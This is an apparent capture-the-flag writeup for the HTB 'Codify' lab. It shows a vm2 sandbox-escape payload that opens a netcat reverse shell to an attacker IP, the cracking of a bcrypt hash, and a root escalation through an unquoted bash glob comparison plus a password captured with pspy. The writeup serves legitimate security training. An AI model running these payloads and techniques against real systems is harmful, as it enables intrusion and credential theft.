HTB Codify done
Codify
Notes
svc@codify:~$ ps aux | grep root | grep doc
ps aux | grep root | grep doc
root 1241 0.0 2.0 1540564 79904 ? Ssl 10:35 0:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1564 0.0 0.0 2888 968 ? Ss 10:35 0:00 /bin/sh /root/scripts/other/docker-startup.sh
root 1565 0.1 0.8 190444 33656 ? Sl 10:35 0:11 /usr/bin/python3 /usr/bin/docker-compose -f /root/scripts/docker/docker-compose.yml up
root 1638 0.0 0.0 1081836 2784 ? Sl 10:35 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3306 -container-ip 172.19.0.2 -container-port 3306
OS:
Ubuntu Jammy (22.04)
Technology:
OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
Apache httpd 2.4.52
Node.js Express framework 18.15.0
vm2 javascript library
IP Address:
10.129.63.28
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
3000/tcp open http Node.js Express framework
Users and pass:
From: /var/www/contact/tickets.db
L: joshua
H: $2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
P: spongebob1
---
After run pspy64
L: root
P: kljh12k3jhaskjh12kjh3
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.63.28_nmap 10.129.63.28 ; cat 10.129.63.28_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 11:53 CET
Nmap scan report for 10.129.63.28
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Codify
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ cat /etc/hosts | grep codify
10.129.63.28 codify.htb
Open website: http://codify.htb/
http://codify.htb/editor
I found an editor to test Node.js code.
I can't make a revshell with Node.js; I got the error "Error: Module "child_process" is not allowed".
Open website: http://codify.htb:3000/about
I found info about the vm2 JavaScript library (vulnerable).
Exploit: CVE-2023-32314 - Sandbox Escape in [email protected]
[CVE-2023-32314 - Sandbox Escape in [email protected]](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100)
Payload - revshell
Start netcat listener
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ netcat -lvnp 80
listening on [any] 80 ...
Run revshell
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|netcat 10.10.14.57 80 >/tmp/f").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
Upgrade to a fully interactive shell
$ script -qc /bin/bash /dev/null
svc@codify:~$
svc@codify:~$ id
id
uid=1001(svc) gid=1001(svc) groups=1001(svc)
svc@codify:~$
Database: tickets.db
Find databases
svc@codify:~$ find / -name "*.db" 2>/dev/null
find / -name "*.db" 2>/dev/null
/var/www/contact/tickets.db
/var/lib/plocate/plocate.db
/var/lib/fwupd/pending.db
/var/lib/PackageKit/transactions.db
/var/lib/command-not-found/commands.db
/usr/lib/firmware/regulatory.db
svc@codify:~$
Get the user hash
svc@codify:~$ sqlite3 /var/www/contact/tickets.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .databases
.databases
main: /var/www/contact/tickets.db r/w
sqlite> .tables
.tables
tickets users
sqlite> SQL * FROM users;
SQL * FROM users;
Error: in prepare, near "SQL": syntax error (1)
sqlite> SELECT * FROM users;
SELECT * FROM users;
3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
sqlite>
Cracking the hash
L: joshua
P: spongebob1
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt joshua.hash
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1 (?)
1g 0:00:01:12 DONE (2025-01-17 14:46) 0.01375g/s 18.56p/s 18.56c/s 18.56C/s crazy1..eunice
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Read flag: user.txt
L: joshua
P: spongebob1
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ ssh joshua@10.129.63.28
The authenticity of host '10.129.63.28 (10.129.63.28)' can't be established.
ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.63.28' (ED25519) to the list of known hosts.
joshua@10.129.63.28's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jan 17 02:00:12 PM UTC 2025
System load: 0.09765625
Usage of /: 64.2% of 6.50GB
Memory usage: 29%
Swap usage: 0%
Processes: 254
Users logged in: 0
IPv4 address for br-030a38808dbf: 172.18.0.1
IPv4 address for br-5ab86a4e40d0: 172.19.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.63.28
IPv6 address for eth0: dead:beef::250:56ff:fe94:add9
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Mar 27 13:01:24 2024 from 10.10.14.23
joshua@codify:~$ pwd
/home/joshua
joshua@codify:~$ ls
user.txt
joshua@codify:~$ cat user.txt ; ip a ; id
d64ea5371807ac61c826ca8ee37c8832
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:ad:d9 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.63.28/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2512sec preferred_lft 2512sec
inet6 dead:beef::250:56ff:fe94:add9/64 scope global dynamic mngtmpaddr
valid_lft 86392sec preferred_lft 14392sec
inet6 fe80::250:56ff:fe94:add9/64 scope link
valid_lft forever preferred_lft forever
3: br-030a38808dbf: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:e8:93:49:f4 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-030a38808dbf
valid_lft forever preferred_lft forever
4: br-5ab86a4e40d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:39:ac:86:54 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5ab86a4e40d0
valid_lft forever preferred_lft forever
inet6 fe80::42:39ff:feac:8654/64 scope link
valid_lft forever preferred_lft forever
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:2a:a6:2d:a8 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
7: veth1fefef1@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-5ab86a4e40d0 state UP group default
link/ether 12:12:8d:d5:80:83 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::1012:8dff:fed5:8083/64 scope link
valid_lft forever preferred_lft forever
uid=1000(joshua) gid=1000(joshua) groups=1000(joshua)
joshua@codify:~$
Privilege Escalation
sudo -l
Problem: missing quotation marks around the right-hand side of the comparison in the if statement, so the entered password is matched as a pattern instead of compared as a literal string:
if [[ $DB_PASS == $USER_PASS ]]; then
---
joshua@codify:~$ sudo -l
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh
joshua@codify:~$
joshua@codify:~$ ls -la /opt/scripts/mysql-backup.sh
-rwxr-xr-x 1 root root 928 Nov 2 2023 /opt/scripts/mysql-backup.sh
joshua@codify:~$
joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"
read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo
if [[ $DB_PASS == $USER_PASS ]]; then
/usr/bin/echo "Password confirmed!"
else
/usr/bin/echo "Password confirmation failed!"
exit 1
fi
/usr/bin/mkdir -p "$BACKUP_DIR"
databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")
for db in $databases; do
/usr/bin/echo "Backing up database: $db"
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done
/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
joshua@codify:~$
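The comparison above is the whole bug: inside [[ ]] an unquoted right-hand operand of == is a glob pattern, so "*" matches any stored password. This added example (not code from the box or the writeup) reproduces that check with a constructed secret and shows the quoted form that compares literally; the helper names are assumptions.

```shell
#!/bin/sh
# Added example, not from the writeup or the target. DB_PASS is a constructed
# stand-in for the value the script reads from /root/.creds.
DB_PASS="c0nstructed-secret"

# Vulnerable: the script's `[[ $DB_PASS == $USER_PASS ]]`. The unquoted
# right-hand side is a pattern, so "*" matches anything. Run through bash -c
# so this file also works when invoked by a POSIX sh.
vulnerable_check() {
  bash -c '[[ $1 == $2 ]]' _ "$DB_PASS" "$1"
}

# Hardened: quoting the right-hand side forces a literal string comparison.
hardened_check() {
  bash -c '[[ $1 == "$2" ]]' _ "$DB_PASS" "$1"
}

# Returns "match" or "no-match" so the result can be checked as a value
# rather than only read from printed output.
check() {  # usage: check vulnerable|hardened <candidate>
  if "${1}_check" "$2"; then echo match; else echo no-match; fi
}

# Walk through the candidates a user might enter: the real secret, a bare
# star, and a wrong password. Only the hardened form rejects "*".
for candidate in "$DB_PASS" '*' 'wrong'; do
  printf '%-20s vulnerable=%-9s hardened=%s\n' "$candidate" \
    "$(check vulnerable "$candidate")" "$(check hardened "$candidate")"
done
```

The mysqldump line in the script has a second weakness that pspy makes visible below: the password is passed as a -p argument, so it sits in the process command line readable by every local user.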
Run pspy64 to watch the processes the script spawns:
https://github.com/DominicBreuker/pspy?tab=readme-ov-file
Get the password for user root
Enter a star "*" as the password
---
joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh
Enter MySQL password for root:
Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!
joshua@codify:~$
---
2025/01/20 11:19:42 CMD: UID=0 PID=3005 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3006 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3007 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3008 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3010 |
2025/01/20 11:19:42 CMD: UID=0 PID=3009 |
2025/01/20 11:19:42 CMD: UID=0 PID=3011 | /usr/bin/echo Backing up database: mysql
2025/01/20 11:19:42 CMD: UID=0 PID=3013 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3012 | /usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 mysql
Read flag: root.txt
L: root
P: kljh12k3jhaskjh12kjh3
---
joshua@codify:~$ su root
Password:
root@codify:/home/joshua# cd ~
root@codify:~#
root@codify:~# ls -a
. .. .bash_history .bashrc .creds .local .mysql_history .profile root.txt scripts .ssh .vimrc
root@codify:~#
root@codify:~# cat root.txt ; ip a ; whoami
87933486cd876cfb49ca5db1351f6c10
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:b3:0b brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.61.78/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3567sec preferred_lft 3567sec
inet6 dead:beef::250:56ff:fe94:b30b/64 scope global dynamic mngtmpaddr
valid_lft 86395sec preferred_lft 14395sec
inet6 fe80::250:56ff:fe94:b30b/64 scope link
valid_lft forever preferred_lft forever
3: br-5ab86a4e40d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:e5:2c:a6:62 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5ab86a4e40d0
valid_lft forever preferred_lft forever
inet6 fe80::42:e5ff:fe2c:a662/64 scope link
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:eb:da:f5:22 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
5: br-030a38808dbf: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:00:12:0e:40 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-030a38808dbf
valid_lft forever preferred_lft forever
7: veth43c5f77@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-5ab86a4e40d0 state UP group default
link/ether d2:15:30:4f:89:9b brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::d015:30ff:fe4f:899b/64 scope link
valid_lft forever preferred_lft forever
root
root@codify:~#
References
[CVE-2023-32314 - Sandbox Escape in [email protected]](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100)
Lessons Learned